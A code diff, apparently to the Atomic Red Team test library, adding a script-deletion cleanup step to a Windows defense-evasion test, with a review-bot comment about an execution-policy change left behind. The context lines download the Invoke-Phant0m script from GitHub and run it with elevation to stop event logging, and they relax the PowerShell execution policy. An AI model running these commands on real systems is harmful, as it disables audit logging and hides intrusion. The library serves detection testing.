diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 8de7dd82..9b010138 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -29356,7 +29356,7 @@ defense-evasion:
 supported_platforms:
 - windows
 executor:
- command: |-
+ command: |
 Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
 $url = "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1"
 $output = "$env:TEMP\Invoke-Phant0m.ps1"
@@ -29365,8 +29365,9 @@ defense-evasion:
 cd $env:TEMP
 Import-Module .\Invoke-Phant0m.ps1
 Invoke-Phant0m
- cleanup_command: Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS"
- -fore red
+ cleanup_command: |
+ Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
+ Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
 name: powershell
 elevation_required: true
 - name: Impair Windows Audit Log Policy
diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1562.002/T1562.002.md
index 6089a6b1..1ca11b6f 100644
--- a/atomics/T1562.002/T1562.002.md
+++ b/atomics/T1562.002/T1562.002.md
@@ -81,6 +81,7 @@ Invoke-Phant0m
 #### Cleanup Commands:
 ```powershell
 Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
+Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
 ```
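Review bot: The new cleanup_command in the second hunk of atomics/Indexes/index.yaml deletes the downloaded script but leaves the `Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned` change made by the command block in place, so the test still leaves a persistent policy change on the host after cleanup. Consider a third cleanup line, `Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Undefined -ErrorAction Ignore`, which clears the CurrentUser-scope policy (it cannot restore a policy the user had set there before the test, so a short comment noting that limitation next to the existing Restart-Computer reminder would help). The same cleanup snippet appears in atomics/T1562.002/T1562.002.md; both files look like generated output from the technique definition, so the edit presumably belongs in that source file and should be regenerated rather than patched here. The executor mapping this hunk edits begins before the hunk.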